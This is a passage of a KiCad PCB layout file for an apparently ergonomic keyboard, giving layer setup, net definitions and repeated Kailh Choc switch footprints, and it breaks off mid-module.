content stringlengths 4 1.04M | lang stringclasses 358
values | score int64 0 5 | repo_name stringlengths 5 114 | repo_path stringlengths 4 229 | repo_licenses listlengths 1 8 |
|---|---|---|---|---|---|
(kicad_pcb (version 20171130) (host pcbnew 5.1.6)
(general
(thickness 1.6)
(drawings 39)
(tracks 833)
(zones 0)
(modules 98)
(nets 74)
)
(page A4)
(layers
(0 F.Cu signal)
(31 B.Cu signal)
(32 B.Adhes user)
(33 F.Adhes user)
(34 B.Paste user)
(35 F.Paste user)
(36 B.SilkS user)
(37 F.SilkS user)
(38 B.Mask user)
(39 F.Mask user)
(40 Dwgs.User user)
(41 Cmts.User user)
(42 Eco1.User user)
(43 Eco2.User user)
(44 Edge.Cuts user)
(45 Margin user hide)
(46 B.CrtYd user hide)
(47 F.CrtYd user)
(48 B.Fab user hide)
(49 F.Fab user)
)
(setup
(last_trace_width 0.254)
(trace_clearance 0.2)
(zone_clearance 0.508)
(zone_45_only no)
(trace_min 0.2)
(via_size 0.8)
(via_drill 0.4)
(via_min_size 0.4)
(via_min_drill 0.3)
(uvia_size 0.3)
(uvia_drill 0.1)
(uvias_allowed no)
(uvia_min_size 0.2)
(uvia_min_drill 0.1)
(edge_width 0.05)
(segment_width 0.2)
(pcb_text_width 0.3)
(pcb_text_size 1.5 1.5)
(mod_edge_width 0.12)
(mod_text_size 1 1)
(mod_text_width 0.15)
(pad_size 1.524 1.524)
(pad_drill 0.762)
(pad_to_mask_clearance 0.05)
(aux_axis_origin 0 0)
(visible_elements FFFFFF7F)
(pcbplotparams
(layerselection 0x010fc_ffffffff)
(usegerberextensions false)
(usegerberattributes true)
(usegerberadvancedattributes true)
(creategerberjobfile true)
(excludeedgelayer true)
(linewidth 0.100000)
(plotframeref false)
(viasonmask false)
(mode 1)
(useauxorigin false)
(hpglpennumber 1)
(hpglpenspeed 20)
(hpglpendiameter 15.000000)
(psnegative false)
(psa4output false)
(plotreference false)
(plotvalue false)
(plotinvisibletext false)
(padsonsilk false)
(subtractmaskfromsilk false)
(outputformat 1)
(mirror false)
(drillshape 0)
(scaleselection 1)
(outputdirectory ""))
)
(net 0 "")
(net 1 +5V)
(net 2 "Net-(C1-Pad1)")
(net 3 VCC)
(net 4 "Net-(C8-Pad1)")
(net 5 /col4)
(net 6 "Net-(J1-PadA5)")
(net 7 "Net-(J1-PadA7)")
(net 8 "Net-(J1-PadA6)")
(net 9 "Net-(J1-PadB5)")
(net 10 "Net-(Jack0-PadR1)")
(net 11 "Net-(Jack0-PadT)")
(net 12 "Net-(Jack1-PadR1)")
(net 13 "Net-(Jack1-PadT)")
(net 14 /col0)
(net 15 /col8)
(net 16 /col5)
(net 17 /col2)
(net 18 /col1)
(net 19 /col3)
(net 20 /col6)
(net 21 /col7)
(net 22 "Net-(R1-Pad1)")
(net 23 "Net-(R2-Pad2)")
(net 24 /col9)
(net 25 /row0,0)
(net 26 /row1,0)
(net 27 /row1,1)
(net 28 /row0,1)
(net 29 /row0,2)
(net 30 /row0,3)
(net 31 /row1,3)
(net 32 /row1,2)
(net 33 VDD)
(net 34 VSS)
(net 35 "Net-(D0_0-Pad2)")
(net 36 "Net-(D0_1-Pad2)")
(net 37 "Net-(D0_2-Pad2)")
(net 38 "Net-(D0_3-Pad2)")
(net 39 "Net-(D0_5-Pad2)")
(net 40 "Net-(D0_6-Pad2)")
(net 41 "Net-(D0_7-Pad2)")
(net 42 "Net-(D0_8-Pad2)")
(net 43 "Net-(D0_9-Pad2)")
(net 44 "Net-(D1_0-Pad2)")
(net 45 "Net-(D1_1-Pad2)")
(net 46 "Net-(D1_2-Pad2)")
(net 47 "Net-(D1_3-Pad2)")
(net 48 "Net-(D1_4-Pad2)")
(net 49 "Net-(D1_5-Pad2)")
(net 50 "Net-(D1_6-Pad2)")
(net 51 "Net-(D1_7-Pad2)")
(net 52 "Net-(D1_8-Pad2)")
(net 53 "Net-(D1_9-Pad2)")
(net 54 "Net-(D2_0-Pad2)")
(net 55 "Net-(D2_1-Pad2)")
(net 56 "Net-(D2_2-Pad2)")
(net 57 "Net-(D2_3-Pad2)")
(net 58 "Net-(D2_4-Pad2)")
(net 59 "Net-(D2_5-Pad2)")
(net 60 "Net-(D2_6-Pad2)")
(net 61 "Net-(D2_7-Pad2)")
(net 62 "Net-(D2_8-Pad2)")
(net 63 "Net-(D2_9-Pad2)")
(net 64 "Net-(D3_3-Pad2)")
(net 65 "Net-(D3_4-Pad2)")
(net 66 "Net-(D3_5-Pad2)")
(net 67 "Net-(D3_6-Pad2)")
(net 68 "Net-(D0_4-Pad2)")
(net 69 "Net-(C2-Pad2)")
(net 70 /D-)
(net 71 /D+)
(net 72 "Net-(R9-Pad1)")
(net 73 GND)
(net_class Default "This is the default net class."
(clearance 0.2)
(trace_width 0.254)
(via_dia 0.8)
(via_drill 0.4)
(uvia_dia 0.3)
(uvia_drill 0.1)
(add_net /D+)
(add_net /D-)
(add_net /col0)
(add_net /col1)
(add_net /col2)
(add_net /col3)
(add_net /col4)
(add_net /col5)
(add_net /col6)
(add_net /col7)
(add_net /col8)
(add_net /col9)
(add_net /row0,0)
(add_net /row0,1)
(add_net /row0,2)
(add_net /row0,3)
(add_net /row1,0)
(add_net /row1,1)
(add_net /row1,2)
(add_net /row1,3)
(add_net "Net-(C1-Pad1)")
(add_net "Net-(C2-Pad2)")
(add_net "Net-(C8-Pad1)")
(add_net "Net-(D0_0-Pad2)")
(add_net "Net-(D0_1-Pad2)")
(add_net "Net-(D0_2-Pad2)")
(add_net "Net-(D0_3-Pad2)")
(add_net "Net-(D0_4-Pad2)")
(add_net "Net-(D0_5-Pad2)")
(add_net "Net-(D0_6-Pad2)")
(add_net "Net-(D0_7-Pad2)")
(add_net "Net-(D0_8-Pad2)")
(add_net "Net-(D0_9-Pad2)")
(add_net "Net-(D1_0-Pad2)")
(add_net "Net-(D1_1-Pad2)")
(add_net "Net-(D1_2-Pad2)")
(add_net "Net-(D1_3-Pad2)")
(add_net "Net-(D1_4-Pad2)")
(add_net "Net-(D1_5-Pad2)")
(add_net "Net-(D1_6-Pad2)")
(add_net "Net-(D1_7-Pad2)")
(add_net "Net-(D1_8-Pad2)")
(add_net "Net-(D1_9-Pad2)")
(add_net "Net-(D2_0-Pad2)")
(add_net "Net-(D2_1-Pad2)")
(add_net "Net-(D2_2-Pad2)")
(add_net "Net-(D2_3-Pad2)")
(add_net "Net-(D2_4-Pad2)")
(add_net "Net-(D2_5-Pad2)")
(add_net "Net-(D2_6-Pad2)")
(add_net "Net-(D2_7-Pad2)")
(add_net "Net-(D2_8-Pad2)")
(add_net "Net-(D2_9-Pad2)")
(add_net "Net-(D3_3-Pad2)")
(add_net "Net-(D3_4-Pad2)")
(add_net "Net-(D3_5-Pad2)")
(add_net "Net-(D3_6-Pad2)")
(add_net "Net-(J1-PadA5)")
(add_net "Net-(J1-PadA6)")
(add_net "Net-(J1-PadA7)")
(add_net "Net-(J1-PadB5)")
(add_net "Net-(Jack0-PadR1)")
(add_net "Net-(Jack0-PadT)")
(add_net "Net-(Jack1-PadR1)")
(add_net "Net-(Jack1-PadT)")
(add_net "Net-(R1-Pad1)")
(add_net "Net-(R2-Pad2)")
(add_net "Net-(R9-Pad1)")
)
(net_class Power ""
(clearance 0.2)
(trace_width 0.381)
(via_dia 0.8)
(via_drill 0.4)
(uvia_dia 0.3)
(uvia_drill 0.1)
(add_net +5V)
(add_net GND)
(add_net VCC)
(add_net VDD)
(add_net VSS)
)
(module switches:Choc_PG1350_MX_Spacing (layer F.Cu) (tedit 5F834A4E) (tstamp 5ECCC290)
(at 163 88 15)
(descr "Kailh \"Choc\" PG1350 keyswitch")
(tags kailh,choc)
(path /5FD3AF3A)
(fp_text reference K3_6 (at 0 0 15) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value KEYSW (at 0 10.5 15) (layer Cmts.User) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -9.5 9.5) (end -9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 9.5) (end -9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 -9.5) (end 9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -9.5 -9.5) (end 9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -2.6 -3.1) (end 2.6 -3.1) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -3.1) (end 2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -6.3) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -2.6 -3.1) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(pad "" np_thru_hole circle (at -5.5 0 15) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.5 0 15) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.22 -4.2 15) (size 0.9906 0.9906) (drill 0.9906) (layers *.Cu *.Mask))
(pad 1 thru_hole circle (at 0 5.9 15) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 20 /col6))
(pad 2 thru_hole circle (at -5 3.8 15) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 67 "Net-(D3_6-Pad2)"))
(pad "" np_thru_hole circle (at 0 0 15) (size 3.429 3.429) (drill 3.429) (layers *.Cu *.Mask))
)
(module switches:Choc_PG1350_MX_Spacing (layer F.Cu) (tedit 5F834A4E) (tstamp 5ECCC2AF)
(at 142 95 30)
(descr "Kailh \"Choc\" PG1350 keyswitch")
(tags kailh,choc)
(path /5FD3AF30)
(fp_text reference K3_5 (at 0 0 30) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value KEYSW (at 0 10.5 30) (layer Cmts.User) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -9.5 9.5) (end -9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 9.5) (end -9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 -9.5) (end 9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -9.5 -9.5) (end 9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -2.6 -3.1) (end 2.6 -3.1) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -3.1) (end 2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -6.3) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -2.6 -3.1) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(pad "" np_thru_hole circle (at -5.5 0 30) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.5 0 30) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.22 -4.2 30) (size 0.9906 0.9906) (drill 0.9906) (layers *.Cu *.Mask))
(pad 1 thru_hole circle (at 0 5.9 30) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 16 /col5))
(pad 2 thru_hole circle (at -5 3.8 30) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 66 "Net-(D3_5-Pad2)"))
(pad "" np_thru_hole circle (at 0 0 30) (size 3.429 3.429) (drill 3.429) (layers *.Cu *.Mask))
)
(module switches:Choc_PG1350_MX_Spacing (layer F.Cu) (tedit 5F834A4E) (tstamp 5EDAB782)
(at 110 95 330)
(descr "Kailh \"Choc\" PG1350 keyswitch")
(tags kailh,choc)
(path /5EF1CAA2)
(fp_text reference K3_4 (at 0 0 150) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value KEYSW (at 0 10.5 150) (layer Cmts.User) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -9.5 9.5) (end -9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 9.5) (end -9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 -9.5) (end 9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -9.5 -9.5) (end 9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -2.6 -3.1) (end 2.6 -3.1) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -3.1) (end 2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -6.3) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -2.6 -3.1) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(pad "" np_thru_hole circle (at -5.5 0 330) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.5 0 330) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.22 -4.2 330) (size 0.9906 0.9906) (drill 0.9906) (layers *.Cu *.Mask))
(pad 1 thru_hole circle (at 0 5.9 330) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 5 /col4))
(pad 2 thru_hole circle (at -5 3.8 330) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 65 "Net-(D3_4-Pad2)"))
(pad "" np_thru_hole circle (at 0 0 330) (size 3.429 3.429) (drill 3.429) (layers *.Cu *.Mask))
)
(module switches:Choc_PG1350_MX_Spacing (layer F.Cu) (tedit 5F834A4E) (tstamp 5EDCBE57)
(at 89 88 345)
(descr "Kailh \"Choc\" PG1350 keyswitch")
(tags kailh,choc)
(path /5EF1C6CA)
(fp_text reference K3_3 (at 0 0 165) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value KEYSW (at 0 10.5 165) (layer Cmts.User) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -9.5 9.5) (end -9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 9.5) (end -9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 -9.5) (end 9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -9.5 -9.5) (end 9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -2.6 -3.1) (end 2.6 -3.1) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -3.1) (end 2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -6.3) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -2.6 -3.1) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(pad "" np_thru_hole circle (at -5.5 0 345) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.5 0 345) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.22 -4.2 345) (size 0.9906 0.9906) (drill 0.9906) (layers *.Cu *.Mask))
(pad 1 thru_hole circle (at 0 5.9 345) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 19 /col3))
(pad 2 thru_hole circle (at -5 3.8 345) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 64 "Net-(D3_3-Pad2)"))
(pad "" np_thru_hole circle (at 0 0 345) (size 3.429 3.429) (drill 3.429) (layers *.Cu *.Mask))
)
(module switches:Choc_PG1350_MX_Spacing (layer F.Cu) (tedit 5F834A4E) (tstamp 5ECCC252)
(at 229 79)
(descr "Kailh \"Choc\" PG1350 keyswitch")
(tags kailh,choc)
(path /5FD3AEF6)
(fp_text reference K2_9 (at 0 0) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value KEYSW (at 0 10.5) (layer Cmts.User) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -9.5 9.5) (end -9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 9.5) (end -9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 -9.5) (end 9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -9.5 -9.5) (end 9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -2.6 -3.1) (end 2.6 -3.1) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -3.1) (end 2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -6.3) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -2.6 -3.1) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(pad "" np_thru_hole circle (at -5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.22 -4.2) (size 0.9906 0.9906) (drill 0.9906) (layers *.Cu *.Mask))
(pad 1 thru_hole circle (at 0 5.9) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 24 /col9))
(pad 2 thru_hole circle (at -5 3.8) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 63 "Net-(D2_9-Pad2)"))
(pad "" np_thru_hole circle (at 0 0) (size 3.429 3.429) (drill 3.429) (layers *.Cu *.Mask))
)
(module switches:Choc_PG1350_MX_Spacing (layer F.Cu) (tedit 5F834A4E) (tstamp 5ECCC214)
(at 210 67)
(descr "Kailh \"Choc\" PG1350 keyswitch")
(tags kailh,choc)
(path /5FD3AEA6)
(fp_text reference K2_8 (at 0 0) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value KEYSW (at 0 10.5) (layer Cmts.User) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -9.5 9.5) (end -9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 9.5) (end -9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 -9.5) (end 9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -9.5 -9.5) (end 9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -2.6 -3.1) (end 2.6 -3.1) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -3.1) (end 2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -6.3) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -2.6 -3.1) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(pad "" np_thru_hole circle (at -5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.22 -4.2) (size 0.9906 0.9906) (drill 0.9906) (layers *.Cu *.Mask))
(pad 1 thru_hole circle (at 0 5.9) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 15 /col8))
(pad 2 thru_hole circle (at -5 3.8) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 62 "Net-(D2_8-Pad2)"))
(pad "" np_thru_hole circle (at 0 0) (size 3.429 3.429) (drill 3.429) (layers *.Cu *.Mask))
)
(module switches:Choc_PG1350_MX_Spacing (layer F.Cu) (tedit 5F834A4E) (tstamp 5ECCC1B7)
(at 191 61)
(descr "Kailh \"Choc\" PG1350 keyswitch")
(tags kailh,choc)
(path /5FD3AE69)
(fp_text reference K2_7 (at 0 0) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value KEYSW (at 0 10.5) (layer Cmts.User) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -9.5 9.5) (end -9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 9.5) (end -9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 -9.5) (end 9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -9.5 -9.5) (end 9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -2.6 -3.1) (end 2.6 -3.1) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -3.1) (end 2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -6.3) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -2.6 -3.1) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(pad "" np_thru_hole circle (at -5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.22 -4.2) (size 0.9906 0.9906) (drill 0.9906) (layers *.Cu *.Mask))
(pad 1 thru_hole circle (at 0 5.9) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 21 /col7))
(pad 2 thru_hole circle (at -5 3.8) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 61 "Net-(D2_7-Pad2)"))
(pad "" np_thru_hole circle (at 0 0) (size 3.429 3.429) (drill 3.429) (layers *.Cu *.Mask))
)
(module switches:Choc_PG1350_MX_Spacing (layer F.Cu) (tedit 5F834A4E) (tstamp 5ECCC198)
(at 172 66.5)
(descr "Kailh \"Choc\" PG1350 keyswitch")
(tags kailh,choc)
(path /5FD3AE5F)
(fp_text reference K2_6 (at 0 0) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value KEYSW (at 0 10.5) (layer Cmts.User) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -9.5 9.5) (end -9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 9.5) (end -9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 -9.5) (end 9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -9.5 -9.5) (end 9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -2.6 -3.1) (end 2.6 -3.1) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -3.1) (end 2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -6.3) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -2.6 -3.1) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(pad "" np_thru_hole circle (at -5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.22 -4.2) (size 0.9906 0.9906) (drill 0.9906) (layers *.Cu *.Mask))
(pad 1 thru_hole circle (at 0 5.9) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 20 /col6))
(pad 2 thru_hole circle (at -5 3.8) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 60 "Net-(D2_6-Pad2)"))
(pad "" np_thru_hole circle (at 0 0) (size 3.429 3.429) (drill 3.429) (layers *.Cu *.Mask))
)
(module switches:Choc_PG1350_MX_Spacing (layer F.Cu) (tedit 5F834A4E) (tstamp 5ECCC179)
(at 153 69)
(descr "Kailh \"Choc\" PG1350 keyswitch")
(tags kailh,choc)
(path /5FD3AE48)
(fp_text reference K2_5 (at 0 0) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value KEYSW (at 0 10.5) (layer Cmts.User) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -9.5 9.5) (end -9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 9.5) (end -9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 -9.5) (end 9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -9.5 -9.5) (end 9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -2.6 -3.1) (end 2.6 -3.1) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -3.1) (end 2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -6.3) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -2.6 -3.1) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(fp_line (start 6.9 -6.9) (end 6.9 6.9) (layer Eco2.User) (width 0.15))
(fp_line (start -6.9 6.9) (end -6.9 -6.9) (layer Eco2.User) (width 0.15))
(pad "" np_thru_hole circle (at -5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.5 0) (size 1.7018 1.7018) (drill 1.7018) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 5.22 -4.2) (size 0.9906 0.9906) (drill 0.9906) (layers *.Cu *.Mask))
(pad 1 thru_hole circle (at 0 5.9) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 16 /col5))
(pad 2 thru_hole circle (at -5 3.8) (size 2.032 2.032) (drill 1.27) (layers *.Cu *.Mask)
(net 59 "Net-(D2_5-Pad2)"))
(pad "" np_thru_hole circle (at 0 0) (size 3.429 3.429) (drill 3.429) (layers *.Cu *.Mask))
)
(module switches:Choc_PG1350_MX_Spacing (layer F.Cu) (tedit 5F834A4E) (tstamp 5EDAABD6)
(at 99 69)
(descr "Kailh \"Choc\" PG1350 keyswitch")
(tags kailh,choc)
(path /5EEFBA25)
(fp_text reference K2_4 (at 0 0) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value KEYSW (at 0 10.5) (layer Cmts.User) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -9.5 9.5) (end -9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 9.5) (end -9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start 9.5 -9.5) (end 9.5 9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -9.5 -9.5) (end 9.5 -9.5) (layer Eco1.User) (width 0.12))
(fp_line (start -2.6 -3.1) (end 2.6 -3.1) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -3.1) (end 2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start 2.6 -6.3) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
(fp_line (start -2.6 -3.1) (end -2.6 -6.3) (layer Eco2.User) (width 0.15))
